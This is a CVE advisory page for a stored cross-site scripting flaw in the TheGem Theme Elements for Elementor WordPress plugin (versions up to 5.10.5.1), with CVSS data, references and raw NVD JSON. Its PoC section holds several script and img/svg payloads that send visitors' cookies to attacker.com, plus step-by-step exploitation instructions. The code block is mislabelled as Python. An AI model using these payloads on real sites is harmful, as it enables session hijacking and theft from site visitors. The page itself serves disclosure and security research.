CVE-2025-68559

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.10.5.1.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

TheGem Theme Elements for Elementor <= 5.10.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

<!-- CVE-2025-68559 PoC - Stored XSS in TheGem Theme Elements for Elementor -->
<!-- This PoC demonstrates the XSS vulnerability in TheGem Theme Elements for Elementor plugin -->
<!-- Usage: Insert this payload in any text field of TheGem Elements in Elementor editor -->

<script>
  // Basic XSS payload to demonstrate cookie stealing
  document.location='https://attacker.com/steal?cookie='+document.cookie;
</script>

<!-- Alternative payload using img tag with onerror event -->
<img src=x onerror="this.src='https://attacker.com/log?data='+document.cookie">

<!-- More obfuscated payload -->
<svg/onload=eval(atob('ZG9jdW1lbnQuY29va2ll'))>

<!-- Payload to demonstrate session hijacking -->
<script>
  fetch('https://attacker.com/api/log', {
    method: 'POST',
    mode: 'no-cors',
    body: JSON.stringify({
      cookie: document.cookie,
      url: window.location.href,
      userAgent: navigator.userAgent
    })
  });
</script>

<!-- Steps to exploit:
1. Login to WordPress with Contributor+ role
2. Edit any page with Elementor
3. Add TheGem element (e.g., Text Editor, Button, etc.)
4. Insert the XSS payload in the content field
5. Save and publish the page
6. Any user visiting the page will execute the malicious script
-->

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-68559
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-68559
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-68559/
[4] VulDB https://vuldb.com/cve/CVE-2025-68559
[5] https://patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-68559", "sourceIdentifier": "[email protected]", "published": "2025-12-23T12:15:46.290", "lastModified": "2026-04-23T15:36:01.363", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in CodexThemes TheGem Theme Elements (for Elementor) thegem-elements-elementor.This issue affects TheGem Theme Elements (for Elementor): from n/a through <= 5.10.5.1."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:L", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.3, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/thegem-elements-elementor/vulnerability/wordpress-thegem-theme-elements-for-elementor-plugin-5-10-5-1-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}